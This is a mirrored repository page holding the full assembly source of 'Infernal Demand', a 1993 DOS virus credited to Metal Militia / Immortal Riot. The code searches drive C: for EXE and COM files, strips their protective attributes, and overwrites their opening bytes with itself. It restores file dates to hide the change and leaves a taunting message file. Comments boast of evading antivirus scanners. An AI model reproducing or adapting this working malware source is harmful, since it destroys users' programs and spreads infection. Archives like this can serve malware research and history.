mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-22 10:08:51 +00:00
4b9382ddbc
push
164 lines
6.0 KiB
NASM
164 lines
6.0 KiB
NASM
; VirusName: Infernal Demand
|
|
; Country : Sweden
|
|
; Author : Metal Militia / Immortal Riot
|
|
; Date : 10/08/1993
|
|
;
|
|
;
|
|
; This is our (Metal Militia's) very first scratch virus. It's just
|
|
; an overwriting one. It overwrites the first 999 bytes in exe/com
|
|
; files. (Write protected/hidden files are also "infected"). This (999)
|
|
; isn't really the virus size, but the virus, is set to overwrite the
|
|
; first 999 bytes. If the programs are less then 999 bytes, the virus
|
|
; will overwrite it anyhow.
|
|
;
|
|
; When you starts this, the virus will make a file under your c:\
|
|
; which is called "Infernal.ir". The file includes a rather nice
|
|
; "poem" written by the person sitting behind the keys here..
|
|
;
|
|
; The "infected" files attributes (time/day), will be saved
|
|
; and restored, the file-size will not be hidden, but anyway..
|
|
;
|
|
; It doesn't contain any encryption nor nuking routine, but
|
|
; who cares about that for an overwriting virus?
|
|
;
|
|
; F-prot finds this is some trivial-shit, but it ain't!
|
|
; Mcafee scan v108 and S&S Toolkit's FindViru can't find this
|
|
;
|
|
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
|
|
; INFERNAL DEMAND
|
|
; ÄÄ-ÄÄÄÄÄÄ-ÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄÄÄÄÄÄ--ÄÄÄÄÄÄÄ--Ä-ÄÄÄÄÄÄÄÄÄÄÄÄÄ-ÄÄÄÄÄ-Ä
|
|
cseg segment byte public
|
|
assume cs:cseg, ds:cseg
|
|
|
|
org 100h
|
|
|
|
INFERNAL proc far
|
|
|
|
start:
|
|
mov ah,19h ; get current drive
|
|
int 21h ;
|
|
push ax ;
|
|
|
|
mov ah,0Eh ;
|
|
mov dl,02h ; drive C:
|
|
int 21h
|
|
|
|
great:
|
|
mov dx,offset ExeMask ; offset 'EXEMASK'
|
|
mov ah,4Eh ; find first
|
|
int 21h ;
|
|
|
|
jnc go_for_it ; jmp if no ERROR
|
|
|
|
|
|
mov dx,offset ComMask ; offset 'COMMASK'
|
|
mov ah,4Eh ; find first
|
|
;
|
|
again: ;
|
|
int 21h ;
|
|
|
|
jc chdir ; If ERROR change directory
|
|
|
|
|
|
go_for_it:
|
|
mov ax,4300h ; Get attribute of file
|
|
mov dx,9eh ; Pointer to name in DTA
|
|
int 21h ;
|
|
|
|
push cx ; Push the attrib to stack
|
|
|
|
mov ax,4301h ; Set attribute to
|
|
xor cx,cx ; normal
|
|
int 21h ;
|
|
|
|
mov ax,3D02h ; Open file
|
|
mov dx,9eh ; Pointer to name in DTA
|
|
int 21h
|
|
|
|
jc next ; if error, get next file
|
|
|
|
xchg ax,bx ; Swap AX & BX
|
|
; so the filehandle ends up
|
|
; in BX
|
|
|
|
mov ax,5700h ; Get file date
|
|
int 21h ;
|
|
|
|
|
|
push cx ; Save file dates
|
|
push dx ;
|
|
|
|
mov dx,100h ; Write code from 100h
|
|
mov ah,40h ; to target file.
|
|
mov cx,789 ; Write XXX bytes
|
|
int 21h ;
|
|
|
|
|
|
pop dx ; Get the saved
|
|
pop cx ; filedates from the stack
|
|
|
|
mov ax,5701h ; Set them back to the file
|
|
int 21h ;
|
|
|
|
mov ah,3Eh ; Close the file
|
|
int 21h ;
|
|
|
|
pop cx ; Restore the attribs from
|
|
; the stack.
|
|
|
|
mov dx,9eh ; Pointer to name in DTA
|
|
mov ax,4301h ; Set them attributes back
|
|
int 21h ;
|
|
|
|
next:
|
|
mov ah,4Fh ; now get the next file
|
|
jmp short again ; and do it all over again
|
|
|
|
chdir:
|
|
mov ah,3ch
|
|
mov cx,0
|
|
mov dx,offset makeit
|
|
int 21h
|
|
|
|
xchg ax,bx
|
|
mov ah,40h
|
|
mov cx,meslen
|
|
mov dx,offset note
|
|
int 21h
|
|
|
|
mov ah,3eh
|
|
int 21h
|
|
|
|
mov dx,offset updir ; offset 'updir'
|
|
mov ah,3bh ; change directory
|
|
int 21h
|
|
|
|
jnc great ; jmp to great if no ERROR
|
|
|
|
exit:
|
|
pop dx ;
|
|
mov ah,0Eh ; restore org. drive
|
|
int 21h ;
|
|
|
|
retn ; return to PROMPT
|
|
|
|
|
|
ExeMask db '*.EXE',0
|
|
ComMask db '*.COM',0
|
|
Makeit db 'c:\infernal.ir',0
|
|
UpDir db '..',0
|
|
Note db 'Infernal Demand! '
|
|
db '(c) Metal Militia / Immortal Riot '
|
|
Dumpnote db ' ',0dh,0ah
|
|
db 'Your misery is our pleasure! ',0dh,0ah
|
|
db 'Your nightmare is our dream! ',0dh,0ah
|
|
db 'Your hell is our paradise! ',0dh,0ah
|
|
db 'Your lost is our demand! ',0dh,0ah
|
|
db 'Your cry is our laugh! ',0dh,0ah
|
|
db 'And your fate is ours!',0dh,0ah
|
|
Meslen equ $-note
|
|
|
|
INFERNAL endp
|
|
|
|
cseg ends
|
|
end start |